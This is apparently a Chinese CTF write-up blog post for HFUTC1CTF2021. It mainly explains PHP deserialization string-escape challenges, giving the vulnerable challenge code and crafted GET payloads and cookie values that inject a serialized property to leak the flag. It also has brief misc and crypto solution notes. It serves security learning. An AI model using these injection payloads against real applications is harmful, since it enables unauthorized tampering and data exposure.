<!DOCTYPE html><html lang="zh-CN"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=2"><meta name="theme-color" content="#FFF"><link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png"><link rel="icon" type="image/ico" sizes="32x32" href="/images/favicon.ico"><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><link rel="alternate" type="application/rss+xml" title="dpm12345" href="http://dpm12345.cn/rss.xml"><link rel="alternate" type="application/atom+xml" title="dpm12345" href="http://dpm12345.cn/atom.xml"><link rel="alternate" type="application/json" title="dpm12345" href="http://dpm12345.cn/feed.json"><link rel="stylesheet" href="//fonts.googleapis.com/css?family=Mulish:300,300italic,400,400italic,700,700italic%7CFredericka%20the%20Great:300,300italic,400,400italic,700,700italic%7CNoto%20Serif%20JP:300,300italic,400,400italic,700,700italic%7CNoto%20Serif%20SC:300,300italic,400,400italic,700,700italic%7CInconsolata:300,300italic,400,400italic,700,700italic&display=swap&subset=latin,latin-ext"><link rel="stylesheet" href="/css/app.css?v=0.2.5"><meta name="keywords" content="CTF,笔记"><link rel="canonical" href="http://dpm12345.cn/posts/d762243c/"><title>HFUTC1CTF2021 - CTF | dpm12345-blog = dpm12345 = 路漫漫其修远兮</title><meta name="generator" content="Hexo 6.3.0"><style>.github-emoji{position:relative;display:inline-block;width:1.2em;min-height:1.2em;overflow:hidden;vertical-align:top;color:transparent}.github-emoji>span{position:relative;z-index:10}.github-emoji .fancybox,.github-emoji img{margin:0!important;padding:0!important;border:none!important;outline:0!important;text-decoration:none!important;user-select:none!important;cursor:auto!important}.github-emoji img{height:1.2em!important;width:1.2em!important;position:absolute!important;left:50%!important;top:50%!important;transform:translate(-50%,-50%)!important;user-select:none!important;cursor:auto!important}.github-emoji-fallback{color:inherit}.github-emoji-fallback img{opacity:0!important}</style></head><body itemscope itemtype="http://schema.org/WebPage"><div id="loading"><div class="cat"><div class="body"></div><div class="head"><div class="face"></div></div><div class="foot"><div class="tummy-end"></div><div class="bottom"></div><div class="legs left"></div><div class="legs right"></div></div><div class="paw"><div class="hands left"></div><div class="hands right"></div></div></div></div><div id="container"><header id="header" itemscope itemtype="http://schema.org/WPHeader"><div class="inner"><div id="brand"><div class="pjax"><h1 itemprop="name headline">HFUTC1CTF2021</h1><div class="meta"><span class="item" title="创建时间：2022-07-23 20:10:32"><span class="icon"><i class="ic i-calendar"></i> </span><span class="text">发表于</span> <time itemprop="dateCreated datePublished" datetime="2022-07-23T20:10:32+08:00">2022-07-23</time> </span><span class="item" title="本文字数"><span class="icon"><i class="ic i-pen"></i> </span><span class="text">本文字数</span> <span>7.3k</span> <span class="text">字</span> </span><span class="item" title="阅读时长"><span class="icon"><i class="ic i-clock"></i> </span><span class="text">阅读时长</span> <span>10 分钟</span></span></div></div></div><nav id="nav"><div class="inner"><div class="toggle"><div class="lines" aria-label="切换导航栏"><span class="line"></span> <span class="line"></span> <span class="line"></span></div></div><ul class="menu"><li class="item title"><a href="/" rel="start">dpm12345-blog</a></li></ul><ul class="right"><li class="item theme"><i class="ic i-sun"></i></li><li class="item search"><i class="ic i-search"></i></li></ul></div></nav></div><div id="imgs" class="pjax"><ul><li class="item" data-background-image="https://pic.imgdb.cn/item/63c56b0bbe43e0d30e768d92.jpg"></li><li class="item" data-background-image="https://pic.imgdb.cn/item/63c5685dbe43e0d30e71065e.png"></li><li class="item" data-background-image="https://pic.imgdb.cn/item/63c56b81be43e0d30e776d15.jpg"></li><li class="item" data-background-image="https://pic.imgdb.cn/item/63c56ad8be43e0d30e763875.png"></li><li class="item" data-background-image="https://pic.imgdb.cn/item/63c56a0cbe43e0d30e75135b.jpg"></li><li class="item" data-background-image="https://pic.imgdb.cn/item/63c56ab0be43e0d30e75f603.jpg"></li></ul></div><div id="waves"><svg class="waves" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 24 150 28" preserveAspectRatio="none" shape-rendering="auto"><defs><path id="gentle-wave" d="M-160 44c30 0 58-18 88-18s 58 18 88 18 58-18 88-18 58 18 88 18 v44h-352z"/></defs><g class="parallax"><use xlink:href="#gentle-wave" x="48" y="0"/><use xlink:href="#gentle-wave" x="48" y="3"/><use xlink:href="#gentle-wave" x="48" y="5"/><use xlink:href="#gentle-wave" x="48" y="7"/></g></svg></div></header><main><div class="inner"><div id="main" class="pjax"><div class="article wrap"><div class="breadcrumb" itemscope itemtype="https://schema.org/BreadcrumbList"><i class="ic i-home"></i> <span><a href="/">首页</a></span><i class="ic i-angle-right"></i> <span class="current" itemprop="itemListElement" itemscope itemtype="https://schema.org/ListItem"><a href="/categories/CTF/" itemprop="item" rel="index" title="分类于 CTF"><span itemprop="name">CTF</span></a><meta itemprop="position" content="1"></span></div><article itemscope itemtype="http://schema.org/Article" class="post block" lang="zh-CN"><link itemprop="mainEntityOfPage" href="http://dpm12345.cn/posts/d762243c/"><span hidden itemprop="author" itemscope itemtype="http://schema.org/Person"><meta itemprop="image" content="/images/avatar.jpg"><meta itemprop="name" content="zhong"><meta itemprop="description" content="路漫漫其修远兮, 学习记录"></span><span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization"><meta itemprop="name" content="dpm12345"></span><div class="body md" itemprop="articleBody"><h1 id="Web"><a href="#Web" class="headerlink" title="Web"></a>Web</h1><h2 id="warmup"><a href="#warmup" class="headerlink" title="warmup"></a>warmup</h2><h2 id="version"><a href="#version" class="headerlink" title="version"></a>version</h2><h2 id="baby-escape"><a href="#baby-escape" class="headerlink" title="baby escape"></a>baby escape</h2><pre><code class="php">&lt;?php
error_reporting(0);
highlight_file(__FILE__);
include("flag.php");
class Foo
{
    public $key;
    public $test = 'nonono';
    public function __construct($k)
    {
        $this-&gt;key = $k;
    }
}
$k = $_GET['k'];
if (isset($k)) {
    $foo = new Foo($k);
    $msg = str_replace('HFUT', 'C1CTF_IS_FUN', serialize($foo));
    $foo_ultimate = unserialize($msg);
    if ($foo_ultimate-&gt;test === 'C1CTF_IS_FUN') {
        echo ($flag);
    } else {
        echo ("what are you doing??");
    }
}
</code></pre><p>很明显为反序列化字符串逃逸4–&gt;12，增加了8个字符 将最后的代码放到网页文件跑一下就行</p><p>由于<code>test</code>在<code>key</code>，那么必然要提前闭合，在之前就序列化<code>test</code>的值</p><p>所以<code>key</code>的后半部分必为<code>s:4:"test";s:12:"C1CTF_IS_FUN";}</code></p><p>先进行上述字符串的序列化，得到</p><pre><code class="php">O:3:"Foo":2:{s:3:"key";s:32:"s:4:"test";s:12:"C1CTF_IS_FUN";}";s:4:"test";s:6:"nonono";}
</code></pre><p>计算<code>key</code>的值的前引号后第一个(即<code>s</code>) 到第一个<code>}</code>的长度，为32 ，恰好为4个8，但由于需要闭合前一个引号，故总共为34个字符（闭合引号，分号)</p><p>所以需要5个<code>HUFT</code>，为了匹配，可在<code>}</code>后加6个字符(因为已经提前结束，无影响)</p><p>故 payload 为</p><pre><code class="raw">k=HFUTHFUTHFUTHFUTHFUT";s:4:"test";s:12:"C1CTF_IS_FUN";};;;;;;
</code></pre><h2 id="easy-escape"><a href="#easy-escape" class="headerlink" title="easy escape"></a>easy escape</h2><p>最后构造的两个类为</p><pre><code class="php">$foo1 = new Foo4("C1CTF_IS_FUNC1CTF_IS_FUNC1CTF_IS_FUNC1CTF_IS_FUNC1CTF_IS_FUN", '";s:1:"a";s:0:"";s:4:"test";s:4:"HFUT";s:1:"b";s:0:"";}');
$foo2 = new Foo4("C1CTF_IS_FUNC1CTF_IS_FUNC1CTF_IS_FUNC1CTF_IS_FUNC1CTF_IS_FUN", '";s:4:"test";s:4:"HFUT";s:1:"b";s:0:"";s:5:"space";s:0:"";}');
</code></pre><p>源代码</p><pre><code class="php">&lt;?php
error_reporting(0);
highlight_file(__FILE__);
include("flag.php");
class Foo1
{
    public $space;
    public $a;
    public $test = 'nonono';
    public $b;
    public function __construct($a, $b)
    {
        $this-&gt;a = $a;
        $this-&gt;b = $b;
    }
}
class Foo2
{
    public $b;
    public $test = 'nonono';
    public $a;
    public $space;
    public function __construct($a, $b)
    {
        $this-&gt;a = $a;
        $this-&gt;b = $b;
    }
}
class Foo3
{
    public $a;
    public $b;
    public $space;
    public $test = 'nonono';
    public function __construct($a, $b)
    {
        $this-&gt;a = $a;
        $this-&gt;b = $b;
    }
}
class Foo4
{
    public $a;
    public $test = 'nonono';
    public $b;
    public $space;
    public function __construct($a, $b)
    {
        $this-&gt;a = $a;
        $this-&gt;b = $b;
    }
}
$a1 = $_GET['a1'];
$b1 = $_GET['b1'];
$a2 = $_GET['a2'];
$b2 = $_GET['b2'];
$choice1 = "Foo1";
$choice2 = "Foo1";
if (isset($_COOKIE["choice1"]) &amp;&amp; isset($_COOKIE["choice2"])) {
    $choice1 = $_COOKIE["choice1"];
    $choice2 = $_COOKIE["choice2"];
}
if (isset($a1) &amp;&amp; isset($b1) &amp;&amp; isset($a2) &amp;&amp; isset($b2)) {
    switch ($choice1) {
        case "Foo1":
            $foo1 = new Foo1($a1, $b1);
            break;
        case "Foo2":
            $foo1 = new Foo2($a1, $b1);
            break;
        case "Foo3":
            $foo1 = new Foo3($a1, $b1);
            break;
        case "Foo4":
            $foo1 = new Foo4($a1, $b1);
            break;
        default:
            $foo1 = new Foo1($a1, $b1);
    }
    switch ($choice2) {
        case "Foo1":
            $foo2 = new Foo1($a2, $b2);
            break;
        case "Foo2":
            $foo2 = new Foo2($a2, $b2);
            break;
        case "Foo3":
            $foo2 = new Foo3($a2, $b2);
            break;
        case "Foo4":
            $foo2 = new Foo4($a2, $b2);
            break;
        default:
            $foo2 = new Foo1($a2, $b2);
    }
    $msg1 = str_replace('C1CTF_IS_FUN', 'HFUT', serialize($foo1));
    $msg2 = str_replace('C1CTF_IS_FUN', 'HFUT', serialize($foo2));
    $foo_ultimate1 = unserialize($msg1);
    $foo_ultimate2 = unserialize($msg2);
    if ($foo_ultimate1-&gt;test === 'HFUT' &amp;&amp; $foo_ultimate1-&gt;a === '' &amp;&amp; $foo_ultimate1-&gt;b === '') {
        if ($foo_ultimate2-&gt;test === 'HFUT' &amp;&amp; $foo_ultimate2-&gt;b === '' &amp;&amp; $foo_ultimate2-&gt;space === '') {
            echo ($flag);
        } else {
            echo ("what are you fuxking doing??");
        }
    }
}
</code></pre><p>代码分析得最重要部分为后半部分的</p><pre><code class="php">$msg1 = str_replace('C1CTF_IS_FUN', 'HFUT', serialize($foo1));
$msg2 = str_replace('C1CTF_IS_FUN', 'HFUT', serialize($foo2));
$foo_ultimate1 = unserialize($msg1);
$foo_ultimate2 = unserialize($msg2);
if ($foo_ultimate1-&gt;test === 'HFUT' &amp;&amp; $foo_ultimate1-&gt;a === '' &amp;&amp; $foo_ultimate1-&gt;b === '') {
    if ($foo_ultimate2-&gt;test === 'HFUT' &amp;&amp; $foo_ultimate2-&gt;b === '' &amp;&amp; $foo_ultimate2-&gt;space === '') {
        echo ($flag);
    } else {
        echo ("what are you fuxking doing??");
    }
}
</code></pre><p>看到字符串过滤，很容易想到字符串逃逸，</p><h3 id="对第一个-if-判断"><a href="#对第一个-if-判断" class="headerlink" title="对第一个 if 判断"></a>对第一个 if 判断</h3><p>这里的主要思想为：当<code>$a</code>的字符串比较长时，通过过滤，字符串缩短，使得后面的<code>$b</code>的一部分值包含在变量a的序列化中，即如<code>s:1:"b";s:59:"</code>包含在其中，使得b的序列化并未开始，由于此时冒号后面可自动添加序列化字符串，那么可在原b变量上加上需要满足条件的序列化字符串，即<code>s:1:"a";s:0:"";s:4:"test";s:4:"HFUT";s:1:"b";s:0:"";</code>,为了能够使其序列化成功，可在最后加上<code>}</code>，使其提前结束。</p><p>那么接下来的主力工作是要让a的序列化字符串长度在过滤后恰能到达b的字符串值的前引号的位置，由于对space无要求，在以上分析中，只需a在b前即可，即可选用Foo1，Foo3，Foo4三个类，这里采用Foo4</p><p>首先输入空值进行序列化操作，得到</p><pre><code class="php">O:4:"Foo4":4:{s:1:"a";s:0:"";s:4:"test";s:6:"nonono";s:1:"b";s:0:"";s:5:"space";N;}
</code></pre><p>计算从a的值的后引号到b的值的前引号的长度，发现为39个，不是12-4=8的倍数，为了满足，可在b的值开头加上任意一个字符(这里使用双引号)，使到其位置恰为40个，为8的5倍，那么a的值应为5个 <code>C1CTF_IS_FUN</code>，据此，前半部分payload为</p><pre><code class="php">a1=C1CTF_IS_FUNC1CTF_IS_FUNC1CTF_IS_FUNC1CTF_IS_FUNC1CTF_IS_FUN&amp;b1=";s:1:"a";s:0:"";s:4:"test";s:4:"HFUT";s:1:"b";s:0:"";}
</code></pre><h3 id="对第二个-if-判断"><a href="#对第二个-if-判断" class="headerlink" title="对第二个 if 判断"></a>对第二个 if 判断</h3><p>同理，通过 a的序列化字符串覆盖部分b的值</p><p>那么根据第一个的分析a必须在b的前面，而在第二个判断中对space有要求，那么space必须在a的后面(此前试过在前面，无法正常序列化)。因此，可选择的类有Foo3、Foo4，由于对于Foo4来说，此时的判断只是增加了对space的赋值，只会对b2的赋值有影响，所以如果选用Foo4 ，a2的值仍为5个<code>C1CTF_IS_FUN</code>，而对Foo3来说，中间少了test的序列化字符串，后引号到前引号的长度有所改变，要重新计算 <code>C1CTF_IS_FUN</code>的个数并凑齐倍数，所以为了方便这里还是使用Foo4由于此时对a的值无要求，对space有要求，因此此时<code>b2=";s:4:"test";s:4:"HFUT";s:1:"b";s:0:"";s:5:"space";s:0:"";}</code>故后半部分payload</p><pre><code class="php">a2=C1CTF_IS_FUNC1CTF_IS_FUNC1CTF_IS_FUNC1CTF_IS_FUNC1CTF_IS_FUN&amp;b2=";s:4:"test";s:4:"HFUT";s:1:"b";s:0:"";s:5:"space";s:0:"";}
</code></pre><p>故最后的 payload</p><p><strong>GET</strong></p><pre><code class="php">a1=C1CTF_IS_FUNC1CTF_IS_FUNC1CTF_IS_FUNC1CTF_IS_FUNC1CTF_IS_FUN&amp;b1=";s:1:"a";s:0:"";s:4:"test";s:4:"HFUT";s:1:"b";s:0:"";}&amp;a2=C1CTF_IS_FUNC1CTF_IS_FUNC1CTF_IS_FUNC1CTF_IS_FUNC1CTF_IS_FUN&amp;b2=";s:4:"test";s:4:"HFUT";s:1:"b";s:0:"";s:5:"space";s:0:"";}
</code></pre><p><strong>SESSION</strong></p><pre><code class="raw">choice1 = Foo4
choice2 = Foo4
</code></pre><h3 id="同理，第二个使用-Foo3"><a href="#同理，第二个使用-Foo3" class="headerlink" title="同理，第二个使用 Foo3"></a>同理，第二个使用 Foo3</h3><p>先空字符序列化，得到</p><pre><code class="php">O:4:"Foo3":4:{s:1:"a";s:0:"";s:1:"b";s:0:"";s:5:"space";N;s:4:"test";s:6:"nonono";}
</code></pre><p>只有15个字符，那么只需要2个<code>C1CTF_IS_FUN</code>,b添加一个字符即可，故payload为</p><p><strong>GET</strong></p><pre><code class="php">a1=C1CTF_IS_FUNC1CTF_IS_FUNC1CTF_IS_FUNC1CTF_IS_FUNC1CTF_IS_FUN&amp;b1=";s:1:"a";s:0:"";s:4:"test";s:4:"HFUT";s:1:"b";s:0:"";}&amp;a2=C1CTF_IS_FUNC1CTF_IS_FUN&amp;b2=";s:4:"test";s:4:"HFUT";s:1:"b";s:0:"";s:5:"space";s:0:"";}
</code></pre><p><strong>SESSION</strong></p><pre><code class="raw">choice1 = Foo4
choice2 = Foo3
</code></pre><p>同理，对于第一个类的更换也是如此进行</p><h2 id="baby-php"><a href="#baby-php" class="headerlink" title="baby php"></a>baby php</h2><h2 id="baby-calculator"><a href="#baby-calculator" class="headerlink" title="baby calculator"></a>baby calculator</h2><h2 id="real-calculator"><a href="#real-calculator" class="headerlink" title="real calculator"></a>real calculator</h2><h1 id="Misc"><a href="#Misc" class="headerlink" title="Misc"></a>Misc</h1><h2 id="bigjpg"><a href="#bigjpg" class="headerlink" title="bigjpg"></a>bigjpg</h2><h2 id="音乐带师"><a href="#音乐带师" class="headerlink" title="音乐带师"></a>音乐带师</h2><h2 id="osint"><a href="#osint" class="headerlink" title="osint"></a>osint</h2><h2 id="幸运饼干"><a href="#幸运饼干" class="headerlink" title="幸运饼干"></a>幸运饼干</h2><h2 id="signin"><a href="#signin" class="headerlink" title="signin"></a>signin</h2><p>AES解密</p><h2 id="qrcode"><a href="#qrcode" class="headerlink" title="qrcode"></a>qrcode</h2><p>下载得到的rar是损坏文件，用winhex将第一行第三个改为<code>72</code>，保存解压， 得到一个图片和一个txt文件。打开图片发现图片一闪一闪。那么将该图片用ps打开， 到对应图层，发现二维码部分缺失，这时用仿制图章将左下角分别复制到左上和右上，扫描后得到flag</p><h1 id="Crypto"><a href="#Crypto" class="headerlink" title="Crypto"></a>Crypto</h1><h2 id="嘀嘀嘀"><a href="#嘀嘀嘀" class="headerlink" title="嘀嘀嘀"></a>嘀嘀嘀</h2><p>点开题目首先确认为摩斯密码，解码后得到一串字母，因题目提示栅栏，故栅栏解密， 当组字数为8时，注意到从右往左为”flagis…..”,由此写程序反转字符串，再将flag内容与flag格式结合得到flag</p><div class="tags"><a href="/tags/CTF/" rel="tag"><i class="ic i-tag"></i> CTF</a> <a href="/tags/%E7%AC%94%E8%AE%B0/" rel="tag"><i class="ic i-tag"></i> 笔记</a></div></div><footer><div class="meta"><span class="item"><span class="icon"><i class="ic i-calendar-check"></i> </span><span class="text">更新于</span> <time title="修改时间：2023-06-09 15:09:53" itemprop="dateModified" datetime="2023-06-09T15:09:53+08:00">2023-06-09</time> </span><span id="posts/d762243c/" class="item leancloud_visitors" data-flag-title="HFUTC1CTF2021" title="阅读次数"><span class="icon"><i class="ic i-eye"></i> </span><span class="text">阅读次数</span> <span class="leancloud-visitors-count"></span> <span class="text">次</span></span></div><div class="reward"><button><i class="ic i-heartbeat"></i> 赞赏</button><p>请我喝[茶]~(￣▽￣)~*</p><div id="qr"><div><img data-src="/images/wechatpay.png" alt="zhong 微信支付"><p>微信支付</p></div><div><img data-src="/images/alipay.png" alt="zhong 支付宝"><p>支付宝</p></div><div><img data-src="/images/paypal.png" alt="zhong 贝宝"><p>贝宝</p></div></div></div><div id="copyright"><ul><li class="author"><strong>本文作者： </strong>zhong <i class="ic i-at"><em>@</em></i>dpm12345</li><li class="link"><strong>本文链接：</strong> <a href="http://dpm12345.cn/posts/d762243c/" title="HFUTC1CTF2021">http://dpm12345.cn/posts/d762243c/</a></li><li class="license"><strong>版权声明： </strong>本站所有文章除特别声明外，均采用 <span class="exturl" data-url="aHR0cHM6Ly9jcmVhdGl2ZWNvbW1vbnMub3JnL2xpY2Vuc2VzL2J5LW5jLXNhLzQuMC9kZWVkLnpo"><i class="ic i-creative-commons"><em>(CC)</em></i>BY-NC-SA</span> 许可协议。转载请注明出处！</li></ul></div></footer></article></div><div class="post-nav"><div class="item left"><a href="/posts/e28ceec1/" itemprop="url" rel="prev" data-background-image="https:&#x2F;&#x2F;pic.imgdb.cn&#x2F;item&#x2F;63c56a8abe43e0d30e75bf6f.png" title="git学习"><span class="type">上一篇</span> <span class="category"><i class="ic i-flag"></i></span><h3>git学习</h3></a></div><div class="item right"><a href="/posts/558506d6/" itemprop="url" rel="next" data-background-image="https:&#x2F;&#x2F;pic.imgdb.cn&#x2F;item&#x2F;63c56b35be43e0d30e76e433.jpg" title="MD5常见绕过"><span class="type">下一篇</span> <span class="category"><i class="ic i-flag"></i> CTF</span><h3>MD5常见绕过</h3></a></div></div><div class="wrap" id="comments"></div></div><div id="sidebar"><div class="inner"><div class="panels"><div class="inner"><div class="contents panel pjax" data-title="文章目录"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#Web"><span class="toc-number">1.</span> <span class="toc-text">Web</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#warmup"><span class="toc-number">1.1.</span> <span class="toc-text">warmup</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#version"><span class="toc-number">1.2.</span> <span class="toc-text">version</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#baby-escape"><span class="toc-number">1.3.</span> <span class="toc-text">baby escape</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#easy-escape"><span class="toc-number">1.4.</span> <span class="toc-text">easy escape</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%AF%B9%E7%AC%AC%E4%B8%80%E4%B8%AA-if-%E5%88%A4%E6%96%AD"><span class="toc-number">1.4.1.</span> <span class="toc-text">对第一个 if 判断</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%AF%B9%E7%AC%AC%E4%BA%8C%E4%B8%AA-if-%E5%88%A4%E6%96%AD"><span class="toc-number">1.4.2.</span> <span class="toc-text">对第二个 if 判断</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%90%8C%E7%90%86%EF%BC%8C%E7%AC%AC%E4%BA%8C%E4%B8%AA%E4%BD%BF%E7%94%A8-Foo3"><span class="toc-number">1.4.3.</span> <span class="toc-text">同理，第二个使用 Foo3</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#baby-php"><span class="toc-number">1.5.</span> <span class="toc-text">baby php</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#baby-calculator"><span class="toc-number">1.6.</span> <span class="toc-text">baby calculator</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#real-calculator"><span class="toc-number">1.7.</span> <span class="toc-text">real calculator</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Misc"><span class="toc-number">2.</span> <span class="toc-text">Misc</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#bigjpg"><span class="toc-number">2.1.</span> <span class="toc-text">bigjpg</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E9%9F%B3%E4%B9%90%E5%B8%A6%E5%B8%88"><span class="toc-number">2.2.</span> <span class="toc-text">音乐带师</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#osint"><span class="toc-number">2.3.</span> <span class="toc-text">osint</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%B9%B8%E8%BF%90%E9%A5%BC%E5%B9%B2"><span class="toc-number">2.4.</span> <span class="toc-text">幸运饼干</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#signin"><span class="toc-number">2.5.</span> <span class="toc-text">signin</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#qrcode"><span class="toc-number">2.6.</span> <span class="toc-text">qrcode</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Crypto"><span class="toc-number">3.</span> <span class="toc-text">Crypto</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%98%80%E5%98%80%E5%98%80"><span class="toc-number">3.1.</span> <span class="toc-text">嘀嘀嘀</span></a></li></ol></li></ol></div><div class="related panel pjax" data-title="系列文章"><ul><li><a href="/posts/7c4ba2c4/" rel="bookmark" title="Bugku CTF">Bugku CTF</a></li><li><a href="/posts/78c2084b/" rel="bookmark" title="sql_sum">sql_sum</a></li><li><a href="/posts/ccf5967e/" rel="bookmark" title="CTF">CTF</a></li><li><a href="/posts/558506d6/" rel="bookmark" title="MD5常见绕过">MD5常见绕过</a></li><li class="active"><a href="/posts/d762243c/" rel="bookmark" title="HFUTC1CTF2021">HFUTC1CTF2021</a></li><li><a href="/posts/558506d6/" rel="bookmark" title="MD5常见绕过">MD5常见绕过</a></li><li><a href="/posts/e73517db/" rel="bookmark" title="SQL注入">SQL注入</a></li><li><a href="/posts/813434ca/" rel="bookmark" title="SSRF">SSRF</a></li><li><a href="/posts/47d18edd/" rel="bookmark" title="SSTI">SSTI</a></li><li><a href="/posts/ca25cf0b/" rel="bookmark" title="sqli-labs练习">sqli-labs练习</a></li><li><a href="/posts/dd66f6b6/" rel="bookmark" title="萌新赛">萌新赛</a></li><li><a href="/posts/7c4924dd/" rel="bookmark" title="萌新">萌新</a></li><li><a href="/posts/25b29fe5/" rel="bookmark" title="新春欢乐赛_2022">新春欢乐赛_2022</a></li><li><a href="/posts/96bab31d/" rel="bookmark" title="other">other</a></li><li><a href="/posts/b013ba57/" rel="bookmark" title="信息收集 爆破 命令执行">信息收集 爆破 命令执行</a></li><li><a href="/posts/98069c85/" rel="bookmark" title="php 特性">php 特性</a></li><li><a href="/posts/31915a1e/" rel="bookmark" title="文件包含">文件包含</a></li><li><a href="/posts/592e5fba/" rel="bookmark" title="文件上传">文件上传</a></li><li><a href="/posts/35cb7ca5/" rel="bookmark" title="SQL 注入">SQL 注入</a></li><li><a href="/posts/d3333ead/" rel="bookmark" title="反序列化">反序列化</a></li><li><a href="/posts/f685e8f8/" rel="bookmark" title="单身杯">单身杯</a></li><li><a href="/posts/ba492ba4/" rel="bookmark" title="36D杯练手赛">36D杯练手赛</a></li><li><a href="/posts/26d2b0d0/" rel="bookmark" title="36D杯">36D杯</a></li><li><a href="/posts/b63ac8f1/" rel="bookmark" title="AK赛">AK赛</a></li><li><a href="/posts/cf9eb9c9/" rel="bookmark" title="内部赛">内部赛</a></li><li><a href="/posts/d0dbb8d4/" rel="bookmark" title="2023愚人杯">2023愚人杯</a></li><li><a href="/posts/e58b935e/" rel="bookmark" title="Misc入门">Misc入门</a></li><li><a href="/posts/a9a9d995/" rel="bookmark" title="c1game2022">c1game2022</a></li><li><a href="/posts/df95b584/" rel="bookmark" title="Misc">Misc</a></li><li><a href="/posts/79d29fb/" rel="bookmark" title="菜狗杯">菜狗杯</a></li><li><a href="/posts/9e150aa2/" rel="bookmark" title="代码审计">代码审计</a></li><li><a href="/posts/813434ca/" rel="bookmark" title="SSRF">SSRF</a></li><li><a href="/posts/7f1ae6d2/" rel="bookmark" title="java">java</a></li><li><a href="/posts/e93ac459/" rel="bookmark" title="XXE">XXE</a></li><li><a href="/posts/fe1aa8c3/" rel="bookmark" title="XSS">XSS</a></li><li><a href="/posts/524679b/" rel="bookmark" title="2023年CTF">2023年CTF</a></li><li><a href="/posts/47d18edd/" rel="bookmark" title="SSTI">SSTI</a></li><li><a href="/posts/1f01c3ee/" rel="bookmark" title="BJDCTF2020">BJDCTF2020</a></li><li><a href="/posts/68282885/" rel="bookmark" title="crypto">crypto</a></li><li><a href="/posts/f4c079d9/" rel="bookmark" title="2023ciscn">2023ciscn</a></li><li><a href="/posts/1c49b73d/" rel="bookmark" title="XCTF">XCTF</a></li><li><a href="/posts/8d17cdf0/" rel="bookmark" title="jwt">jwt</a></li><li><a href="/posts/3f9caa7c/" rel="bookmark" title="2022ciscn">2022ciscn</a></li><li><a href="/posts/6882c75c/" rel="bookmark" title="JavaScript 原型链污染(Prototype).md">JavaScript 原型链污染(Prototype).md</a></li><li><a href="/posts/3418e521/" rel="bookmark" title="nodejs">nodejs</a></li><li><a href="/posts/6882c75c/" rel="bookmark" title="JavaScript 原型链污染(Prototype).md">JavaScript 原型链污染(Prototype).md</a></li></ul></div><div class="overview panel" data-title="站点概览"><div class="author" itemprop="author" itemscope itemtype="http://schema.org/Person"><img class="image" itemprop="image" alt="zhong" data-src="/images/avatar.jpg"><p class="name" itemprop="name">zhong</p><div class="description" itemprop="description">学习记录</div></div><nav class="state"><div class="item posts"><a href="/archives/"><span class="count">99</span> <span class="name">文章</span></a></div><div class="item categories"><a href="/categories/"><span class="count">14</span> <span class="name">分类</span></a></div><div class="item tags"><a href="/tags/"><span class="count">50</span> <span class="name">标签</span></a></div></nav><div class="social"><span class="exturl item github" data-url="aHR0cHM6Ly9naXRodWIuY29tL2RwbTEyMzQ1" title="https:&#x2F;&#x2F;github.com&#x2F;dpm12345"><i class="ic i-github"></i></span> <span class="exturl item bilibili" data-url="aHR0cHM6Ly9zcGFjZS5iaWxpYmlsaS5jb20vMTQyNDc4NjIw" title="https:&#x2F;&#x2F;space.bilibili.com&#x2F;142478620"><i class="ic i-bilibili"></i></span> <span class="exturl item music" data-url="aHR0cHM6Ly9tdXNpYy4xNjMuY29tLyMvdXNlci9ob21lP2lkPTUzMDc2NzE5NQ==" title="https:&#x2F;&#x2F;music.163.com&#x2F;#&#x2F;user&#x2F;home?id&#x3D;530767195"><i class="ic i-cloud-music"></i></span></div><ul class="menu"><li class="item"><a href="/" rel="section"><i class="ic i-home"></i>首页</a></li><li class="item dropdown"><a href="javascript:void(0);"><i class="ic i-feather"></i>文章</a><ul class="submenu"><li class="item"><a href="/archives/" rel="section"><i class="ic i-list-alt"></i>归档</a></li><li class="item"><a href="/categories/" rel="section"><i class="ic i-th"></i>分类</a></li><li class="item"><a href="/tags/" rel="section"><i class="ic i-tags"></i>标签</a></li></ul></li><li class="item"><a href="/friends/" rel="section"><i class="ic i-heart"></i>friends</a></li><li class="item"><a href="/statistics/" rel="section"><i class="ic i-shuzhuangtu"></i>统计</a></li></ul></div></div></div><ul id="quick"><li class="prev pjax"><a href="/posts/e28ceec1/" rel="prev" title="上一篇"><i class="ic i-chevron-left"></i></a></li><li class="up"><i class="ic i-arrow-up"></i></li><li class="down"><i class="ic i-arrow-down"></i></li><li class="next pjax"><a href="/posts/558506d6/" rel="next" title="下一篇"><i class="ic i-chevron-right"></i></a></li><li class="percent"></li></ul></div></div><div class="dimmer"></div></div></main><footer id="footer"><div class="inner"><div class="widgets"><div class="rpost pjax"><h2>随机文章</h2><ul><li class="item"><div class="breadcrumb"></div><span><a href="/posts/3b76a5dc/" title="宝塔的相关使用">宝塔的相关使用</a></span></li><li class="item"><div class="breadcrumb"><a href="/categories/leetcode/" title="分类于 leetcode">leetcode</a> <i class="ic i-angle-right"></i> <a href="/categories/leetcode/regular-exercise/" title="分类于 leetcode 刷题">leetcode 刷题</a></div><span><a href="/posts/5beb97b2/" title="无重叠区间">无重叠区间</a></span></li><li 